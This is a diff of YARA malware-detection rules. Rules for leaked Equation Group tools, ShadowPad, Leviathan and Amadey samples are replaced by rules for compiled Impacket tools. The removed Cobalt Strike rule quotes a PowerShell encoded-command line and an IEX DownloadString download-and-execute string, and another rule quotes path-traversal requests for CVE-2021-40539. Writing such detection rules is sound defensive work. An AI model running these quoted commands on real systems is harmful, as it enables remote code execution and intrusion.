 		author = "Florian Roth (Nextron Systems)"
-		id = "2749227b-13e2-5669-a557-567ebd170a2f"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3557-L3578"
+		id = "1b9238d2-b9b1-5633-8481-05a3a97af5a6"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L241-L256"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3e6c4e013727bbbf3859374af46553067a9fc782f2eca582ea13d8eab03380ce"
+		logic_hash = "e0beb6235838b4e8a1312ba53c539c6c3d732ba13a0190c654dcf7ec4389e364"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
-		hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
-		hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
+		hash1 = "ab909f8082c2d04f73d8be8f4c2640a5582294306dffdcc85e83a39d20c49ed6"
 
 	strings:
-		$x1 = "ERROR: TbMalloc() failed for encoded exploit payload" fullword ascii
-		$x2 = "** EncodeExploitPayload ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii
-		$x4 = "** RunExploit ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii
-		$s6 = "Sending Implant Payload (%d-bytes)" fullword ascii
-		$s7 = "ERROR: Encoder failed on exploit payload" fullword ascii
-		$s11 = "ERROR: VulnerableOS() != RET_SUCCESS" fullword ascii
+		$s1 = "impacket.dcerpc.v5.wkst(" ascii
+		$s2 = "dummy_threading(" ascii
+		$s3 = "snetview" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ETBL_ETRE_SMBTOUCH_17 : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Smbtorture : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Compiled Impacket Tools"
 		author = "Florian Roth (Nextron Systems)"
-		id = "88bf610d-1c6e-554a-af82-46b5eb3cc6a5"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3580-L3597"
+		id = "4f9b55e2-93ce-5d08-a228-73233fb0a2c6"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L258-L272"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ef86350732b5064035ff58b63202be29e906d2b566af105f03298e3e339eda52"
+		logic_hash = "63cbd6511c5498b39fa5efadb8fe0caeeaa8d4c2afe534a0169ea38f205a9cba"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef"
-		hash2 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2"
-		hash3 = "7da350c964ea43c149a12ac3d2ce4675cedc079ddc10d1f7c464b16688305309"
+		hash1 = "d2856e98011541883e5b335cb46b713b1a6b2c414966a9de122ee7fb226aa7f7"
 
 	strings:
-		$x1 = "ERROR: Connection terminated by Target (TCP Ack/Fin)" fullword ascii
-		$s2 = "Target did not respond within specified amount of time" fullword ascii
+		$s1 = "impacket" fullword ascii
+		$s2 = "ssmbtorture" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Scanner_Output : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Mimikatz : FILE
 {
 	meta:
-		description = "Detects output generated by EQGRP scanner.exe"
+		description = "Compiled Impacket Tools"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a73bc98f-f7b1-5f16-bf23-1d5c9a7a371b"
-		date = "2017-04-17"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3609-L3626"
+		id = "0b1f5ad0-7070-58d5-946f-157dcb9627ab"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L274-L289"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a8ac7e7f14d72798a1f6658eae4c66d871a525c8cb49afa2ca8656047da20524"
+		logic_hash = "0dce4086887877aa77063dfa3c69d7a17cfa0815c4ca417144d3bbb6ebe68650"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2d8d500bcb3ffd22ddd8bd68b5b2ce935c958304f03729442a20a28b2c0328c1"
 
 	strings:
-		$s0 = "# scanning ip  " ascii
-		$s1 = "# Scan for windows boxes" ascii fullword
-		$s2 = "Going into send" ascii fullword
-		$s3 = "# Does not work" ascii fullword
-		$s4 = "You are the weakest link, goodbye" ascii fullword
-		$s5 = "rpc   Scan for RPC  folks" ascii fullword
+		$s1 = "impacket" fullword ascii
+		$s2 = "smimikatz" fullword ascii
+		$s3 = "otwsdlc" fullword ascii
 
 	condition:
-		filesize < 1000KB and 2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
 }
-
-rule SIGNATURE_BASE_Shadowpad_Nssock2 : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Smbrelayx : FILE
 {
 	meta:
-		description = "Detects malicious nssock2.dll from ShadowPad incident - file nssock2.dll"
+		description = "Compiled Impacket Tools"
 		author = "Florian Roth (Nextron Systems)"
-		id = "47ecc7f8-065a-558b-9bba-300fd28f4eab"
-		date = "2017-08-15"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/shadowpad-in-corporate-networks/81432/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_shadowpad.yar#L13-L35"
+		id = "84abf3cf-841c-592d-a9d1-71d5e76eb43f"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L291-L307"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ea9675d5acfdc80cfa787db2c2dfe2169aa7c5e3ead35f020d0b0b664ecb4bf4"
+		logic_hash = "2afcede9d9f5af102c68e705f29242bc3a56485e79c0acfc347a4ea7f823dfda"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "462a02a8094e833fd456baf0a6d4e18bb7dab1a9f74d5f163a8334921a4ffde8"
-		hash2 = "c45116a22cf5695b618fcdf1002619e8544ba015d06b2e1dbf47982600c7545f"
-		hash3 = "696be784c67896b9239a8af0a167add72b1becd3ef98d03e99207a3d5734f6eb"
-		hash4 = "515d3110498d7b4fdb451ed60bb11cd6835fcff4780cb2b982ffd2740e1347a0"
-		hash5 = "536d7e3bd1c9e1c2fd8438ab75d6c29c921974560b47c71686714d12fb8e9882"
-		hash6 = "637fa40cf7dd0252c87140f7895768f42a370551c87c37a3a77aac00eb17d72e"
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "c67de089f2009b21715744762fc484e8" or pe.imphash ( ) == "11522f7d4b2fc05acba8f534ca1b828a" ) )
-}
-rule SIGNATURE_BASE_LOG_EXPL_Adselfservice_CVE_2021_40539_ADSLOG_Sep21 : LOG CVE_2021_40539 FILE
-{
-	meta:
-		description = "Detects suspicious log lines produeced during the exploitation of ADSelfService vulnerability CVE-2021-40539"
-		author = "Florian Roth (Nextron Systems)"
-		id = "156317c6-e726-506d-8b07-4f74dae2807f"
-		date = "2021-09-20"
-		modified = "2023-12-05"
-		reference = "https://us-cert.cisa.gov/ncas/alerts/aa21-259a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_adselfservice_cve_2021_40539.yar#L2-L14"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "49b7857187c15f48e928747266adca44c227964cef72914616ea269b0e88fe73"
-		score = 70
-		quality = 85
-		tags = "LOG, CVE-2021-40539, FILE"
+		hash1 = "9706eb99e48e445ac4240b5acb2efd49468a800913e70e40b25c2bf80d6be35f"
 
 	strings:
-		$x1 = "Java traceback errors that include references to NullPointerException in addSmartCardConfig or getSmartCardConfig" ascii wide
+		$s1 = "impacket.examples.secretsdump" fullword ascii
+		$s2 = "impacket.examples.serviceinstall" fullword ascii
+		$s3 = "impacket.smbserver(" ascii
+		$s4 = "SimpleHTTPServer(" ascii
 
 	condition:
-		filesize < 50MB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 18000KB and 3 of them )
 }
-rule SIGNATURE_BASE_LOG_EXPL_Adselfservice_CVE_2021_40539_Weblog_Sep21_1 : LOG CVE_2021_40539 FILE
+rule SIGNATURE_BASE_Impacket_Tools_Wmipersist : FILE
 {
 	meta:
-		description = "Detects suspicious log lines produeced during the exploitation of ADSelfService vulnerability CVE-2021-40539"
+		description = "Compiled Impacket Tools"
 		author = "Florian Roth (Nextron Systems)"
-		id = "015957a6-8778-5836-af94-6e6d3838f693"
-		date = "2021-09-20"
-		modified = "2023-12-05"
-		reference = "https://us-cert.cisa.gov/ncas/alerts/aa21-259a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_adselfservice_cve_2021_40539.yar#L16-L29"
+		id = "29bda652-28f0-5ab6-9bc2-411f20ab0dda"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L309-L323"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bc27afd63d32ac95711e5b4e70764fe0d1bcbb4b4b9b4e3f324e058bba2ef8f6"
-		score = 60
+		logic_hash = "df0dfaed264e0acc57f74e40addcaf52f6d8e832524eb638b682a358c81da83f"
+		score = 75
 		quality = 85
-		tags = "LOG, CVE-2021-40539, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2527fff1a3c780f6a757f13a8912278a417aea84295af1abfa4666572bbbf086"
 
 	strings:
-		$x1 = "/ServletApi/../RestApi/LogonCustomization" ascii wide
-		$x2 = "/ServletApi/../RestAPI/Connection" ascii wide
+		$s1 = "swmipersist" fullword ascii
+		$s2 = "\\yzHPlU=QA" ascii
 
 	condition:
-		filesize < 50MB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
 }
-rule SIGNATURE_BASE_Sedll_Javascript_Decryptor : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Lookupsid : FILE
 {
 	meta:
-		description = "Detects SeDll - DLL is used for decrypting and executing another JavaScript backdoor such as Orz"
+		description = "Compiled Impacket Tools"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8fafd139-0c4f-5c51-af8f-b4917d2d69b0"
-		date = "2017-10-18"
-		modified = "2023-01-07"
-		reference = "https://goo.gl/MZ7dRg"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_leviathan.yar#L11-L31"
+		id = "27f13397-b044-54b4-b5e8-c5f7ed374f59"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L325-L339"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "26ef61d8bb1764dddd951526902fb510fbacc8b808fe99ddee1956dc8b59bd1d"
+		logic_hash = "629ddd49377017d6ea2aac9665b21dfdf9a50c917bf915ea892faafd841bf817"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "146aa9a0ec013aa5bdba9ea9d29f59d48d43bc17c6a20b74bb8c521dbb5bc6f4"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "47756725d7a752d3d3cfccfb02e7df4fa0769b72e008ae5c85c018be4cf35cc1"
 
 	strings:
-		$x1 = "SEDll_Win32.dll" fullword ascii
-		$x2 = "regsvr32 /s \"%s\" DR __CIM__" wide
-		$s1 = "WScriptW" fullword ascii
-		$s2 = "IWScript" fullword ascii
-		$s3 = "%s\\%s~%d" fullword wide
-		$s4 = "PutBlockToFileWW" fullword ascii
-		$s5 = "CheckUpAndDownWW" fullword ascii
+		$s1 = "slookupsid" fullword ascii
+		$s2 = "impacket.dcerpc" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and ( 1 of ( $x* ) or 4 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and all of them )
 }
-rule SIGNATURE_BASE_Leviathan_Cobaltstrike_Sample_1 : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Wmiquery : FILE
 {
 	meta:
-		description = "Detects Cobalt Strike sample from Leviathan report"
+		description = "Compiled Impacket Tools"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e29072d8-b4ea-5e94-8a1c-0a1baec5f423"
-		date = "2017-10-18"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/MZ7dRg"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_leviathan.yar#L33-L55"
+		id = "e8bdf27a-9763-5947-854f-162f74ff53be"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L341-L355"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9ebc8c2f8ddba302e0fbde69e27986236053a3d31c50cf3a2f979a9ebb90907f"
+		logic_hash = "fa237b5c1b4881804c33152a1ce9f3a571b506178fde455a8dd9f92af68c5610"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362"
+		hash1 = "202a1d149be35d96e491b0b65516f631f3486215f78526160cf262d8ae179094"
 
 	strings:
-		$x1 = "a54c81.dll" fullword ascii
-		$x2 = "%d is an x64 process (can't inject x86 content)" fullword ascii
-		$x3 = "Failed to impersonate logged on user %d (%u)" fullword ascii
-		$s1 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii
-		$s2 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s" fullword ascii
-		$s3 = "could not run command (w/ token) because of its length of %d bytes!" fullword ascii
-		$s4 = "could not write to process memory: %d" fullword ascii
-		$s5 = "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" fullword ascii
-		$s6 = "Could not connect to pipe (%s): %d" fullword ascii
+		$s1 = "swmiquery" fullword ascii
+		$s2 = "\\yzHPlU=QA" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
 }
-rule SIGNATURE_BASE_Mockdll_Gen : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Atexec : FILE
 {
 	meta:
-		description = "Detects MockDll - regsvr DLL loader"
+		description = "Compiled Impacket Tools"
 		author = "Florian Roth (Nextron Systems)"
-		id = "904a0649-27e7-5024-aa6b-ddb23bba6202"
-		date = "2017-10-18"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/MZ7dRg"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_leviathan.yar#L57-L75"
+		id = "4f02e304-69d4-5952-80be-793379bccac0"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L357-L373"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cbe7b816199d251bfdc751f46bd95da6f0447ebd56f564619d24eb08bbd4a2c7"
+		logic_hash = "e9537a67e17fb980505aead84b15c7dc8a2f3f1e9a4088edd8b313f1b7a9675d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "bfc5c6817ff2cc4f3cd40f649e10cc9ae1e52139f35fdddbd32cb4d221368922"
-		hash2 = "80b931ab1798d7d8a8d63411861cee07e31bb9a68f595f579e11d3817cfc4aca"
+		hash1 = "337bd5858aba0380e16ee9a9d8f0b3f5bfc10056ced4e75901207166689fbedc"
 
 	strings:
-		$x1 = "mock_run_ini_Win32.dll" fullword ascii
-		$x2 = "mock_run_ini_x64.dll" fullword ascii
-		$s1 = "RealCmd=%s %s" fullword ascii
-		$s2 = "MockModule=%s" fullword ascii
+		$s1 = "batexec.exe.manifest" fullword ascii
+		$s2 = "satexec" fullword ascii
+		$s3 = "impacket.dcerpc" fullword ascii
+		$s4 = "# CSZq" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20KB and ( 1 of ( $x* ) or 2 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and 3 of them )
 }
-rule SIGNATURE_BASE_Vbscript_Favicon_File : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Psexec : FILE
 {
 	meta:
-		description = "VBScript cloaked as Favicon file used in Leviathan incident"
+		description = "Compiled Impacket Tools"
 		author = "Florian Roth (Nextron Systems)"
-		id = "84147d4e-d062-5ba4-8019-6bf4b72c36c6"
-		date = "2017-10-18"
-		modified = "2023-01-06"
-		reference = "https://goo.gl/MZ7dRg"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_leviathan.yar#L77-L96"
+		id = "5e8d0964-7e6a-5ff6-b9db-e37f997c3e05"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L375-L390"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5b89ea916adf6864c8b1cb7cd7ee6d74ea47bf17a0b03cc513046f8d260ae376"
+		logic_hash = "922b2adec9c73d36343c0182f72f5a325c93c051a22e3f80236f942287d0738b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "39c952c7e14b6be5a9cb1be3f05eafa22e1115806e927f4e2dc85d609bc0eb36"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "27bb10569a872367ba1cfca3cf1c9b428422c82af7ab4c2728f501406461c364"
 
 	strings:
-		$x1 = "myxml = '<?xml version=\"\"1.0\"\" encoding=\"\"UTF-8\"\"?>';myxml = myxml +'<root>" ascii
-		$x2 = ".Run \"taskkill /im mshta.exe" ascii
-		$x3 = "<script language=\"VBScript\">Window.ReSizeTo 0, 0 : Window.moveTo -2000,-2000 :" ascii
-		$s1 = ".ExpandEnvironmentStrings(\"%ALLUSERSPROFILE%\") &" ascii
-		$s2 = ".ExpandEnvironmentStrings(\"%temp%\") & " ascii
+		$s1 = "impacket.examples.serviceinstall(" ascii
+		$s2 = "spsexec" fullword ascii
+		$s3 = "impacket.examples.remcomsvc(" ascii
 
 	condition:
-		filesize < 100KB and ( uint16( 0 ) == 0x733c and 1 of ( $x* ) ) or ( 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and 2 of them )
 }
-rule SIGNATURE_BASE_MAL_Win_Amadey_Jun25 : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Generic_1 : FILE
 {
 	meta:
-		description = "This rule detects intrinsic patterns of Amadey version 5.34"
-		author = "0x0d4y"
-		id = "a697ef8a-168f-5310-8b23-c504c630be5a"
-		date = "2025-06-18"
-		modified = "2025-07-24"
-		reference = "https://0x0d4y.blog/amadey-targeted-analysis/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_win_amadey_jun25.yar#L1-L23"
+		description = "Compiled Impacket Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d2ce6426-d165-5569-a992-268f05622653"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L392-L427"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "08dc17aa8f7e83bc349339a9a1b48184b094d8c66273d7199a15b206c6416946"
-		score = 80
+		logic_hash = "a66953ca6a99a7880d757a754bb3010aa394de73292975a3741ec5cf1f20385d"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		yarahub_reference_md5 = "1db72c5832fb71b29863ccc3125137a0"
-		yarahub_uuid = "853111b8-e548-46a9-8f5a-ec8621343e0d"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		malpedia_family = "win.amadey"
+		super_rule = 1
+		hash1 = "4f7fad0676d3c3d2d89e8d4e74b6ec40af731b1ddf5499a0b81fc3b1cd797ee3"
+		hash2 = "d256d1e05695d62a86d9e76830fcbb856ba7bd578165a561edd43b9f7fdb18a3"
+		hash3 = "2d8d500bcb3ffd22ddd8bd68b5b2ce935c958304f03729442a20a28b2c0328c1"
+		hash4 = "ab909f8082c2d04f73d8be8f4c2640a5582294306dffdcc85e83a39d20c49ed6"
+		hash5 = "e2205539f29972d4e2a83eabf92af18dd406c9be97f70661c336ddf5eb496742"
+		hash6 = "27bb10569a872367ba1cfca3cf1c9b428422c82af7ab4c2728f501406461c364"
+		hash7 = "dc85a3944fcb8cc0991be100859c4e1bf84062f7428c4dc27c71e08d88383c98"
+		hash8 = "0f7f0d8afb230c31fe6cf349c4012b430fc3d6722289938f7e33ea15b2996e1b"
+		hash9 = "21d85b36197db47b94b0f4995d07b040a0455ebbe6d413bc33d926ee4e0315d9"
+		hash10 = "4c2921702d18e0874b57638433474e54719ee6dfa39d323839d216952c5c834a"
+		hash11 = "47afa5fd954190df825924c55112e65fd8ed0f7e1d6fd403ede5209623534d7d"
+		hash12 = "7d715217e23a471d42d95c624179fe7de085af5670171d212b7b798ed9bf07c2"
+		hash13 = "9706eb99e48e445ac4240b5acb2efd49468a800913e70e40b25c2bf80d6be35f"
+		hash14 = "d2856e98011541883e5b335cb46b713b1a6b2c414966a9de122ee7fb226aa7f7"
+		hash15 = "8ab2b60aadf97e921e3a9df5cf1c135fbc851cb66d09b1043eaaa1dc01b9a699"
+		hash16 = "efff15e1815fb3c156678417d6037ddf4b711a3122c9b5bc2ca8dc97165d3769"
+		hash17 = "e300339058a885475f5952fb4e9faaa09bb6eac26757443017b281c46b03108b"
+		hash18 = "19544863758341fe7276c59d85f4aa17094045621ca9c98f8a9e7307c290bad4"
+		hash19 = "2527fff1a3c780f6a757f13a8912278a417aea84295af1abfa4666572bbbf086"
+		hash20 = "202a1d149be35d96e491b0b65516f631f3486215f78526160cf262d8ae179094"
 
 	strings:
-		$rc4_algorithm = { 8a 96 ?? ?? ?? ?? 0f b6 86 ?? ?? ?? ?? 03 f8 0f b6 ca 03 f9 81 e7 ff 00 00 80 79 ?? 4f 81 cf 00 ff ff ff 47 8a 87 ?? ?? ?? ?? 88 86 ?? ?? ?? ?? 46 88 97 ?? ?? ?? ?? 81 fe 00 01 00 00 7c }
-		$s_MZ_PE_validation = { b8 4d 5a ?? ?? 66 39 06 0f 85 a8 01 ?? ?? 8b 7e 3c 03 fe 81 3f 50 45 00 00  }
-		$s_loop_through_pe_section = { 8b 4c 24 0c 03 ce 03 4e 3c 6a ?? ff b1 08 01 ?? ?? 8b 81 0c 01 00 00 03 c6 50 8b 81 04 01 ?? ?? 03 44 24 20 50 ff 74 24 30 ff 15 f4 f0 44 00 8b 4c 24 10 0f b7 47 06 41 83 44 24 0c 28 89 4c 24 10 3b c8 }
-		$s_str_decryption_algorithm = { 8b cb 0f 43 35 ?? ?? ?? ?? 2b c8 8d 04 0a 33 d2 f7 f3 }
+		$s1 = "bpywintypes27.dll" fullword ascii
+		$s2 = "hZFtPC" fullword ascii
+		$s3 = "impacket" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $rc4_algorithm and 2 of ( $s* )
+		( uint16( 0 ) == 0x5a4d and filesize < 21000KB and all of ( $s* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_SUSP_EXPL_LIBCUE_CVE_2023_43641_Oct23_1 : CVE_2023_43641 FILE
+rule SIGNATURE_BASE_Impacket_Lateral_Movement : FILE
 {
 	meta:
-		description = "Detects a suspicious .cue file that could be an exploitation attempt of libcue vulnerability CVE-2023-43641"
-		author = "Florian Roth"
-		id = "34fcf80c-adcd-55c0-9fb4-261d20f61fa6"
-		date = "2023-10-27"
-		modified = "2023-12-05"
-		reference = "https://github.com/github/securitylab/blob/main/SecurityExploits/libcue/track_set_index_CVE-2023-43641/README.md"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_libcue_cve_2023_43641.yar#L2-L17"
+		description = "Detects Impacket Network Aktivity for Lateral Movement"
+		author = "Markus Neis"
+		id = "44db234c-ac81-5d21-bc2a-8cfd88807c0d"
+		date = "2018-03-22"
+		modified = "2025-03-29"
+		reference = "https://github.com/CoreSecurity/impacket"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L429-L447"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a2cd3c1b0b3551ffb24bf7704c37c1be6c1a9655c74447d2f7f94540dd0ab188"
-		score = 70
+		logic_hash = "6628c27474d5235d5b510a55215762980a5b526b353b740344cb669e8e023e3c"
+		score = 60
 		quality = 85
-		tags = "CVE-2023-43641, FILE"
+		tags = "FILE"
 
 	strings:
-		$a1 = "TRACK "
-		$a2 = "FILE "
-		$s1 = "INDEX 4294"
+		$s1 = "impacket.dcerpc.v5.transport(" ascii
+		$s2 = "impacket.smbconnection(" ascii
+		$s3 = "impacket.dcerpc.v5.ndr(" ascii
+		$s4 = "impacket.spnego(" ascii
+		$s5 = "impacket.smb(" ascii
+		$s6 = "impacket.ntlm(" ascii
+		$s7 = "impacket.nmb(" ascii
 
 	condition:
-		filesize < 100KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 14000KB and 2 of them
 }
-rule SIGNATURE_BASE_Remsec_Executable_Blob_32
+rule SIGNATURE_BASE_Glassrat
 {
 	meta:
-		description = "Detects malware from Symantec's Strider APT report"
-		author = "Symantec"
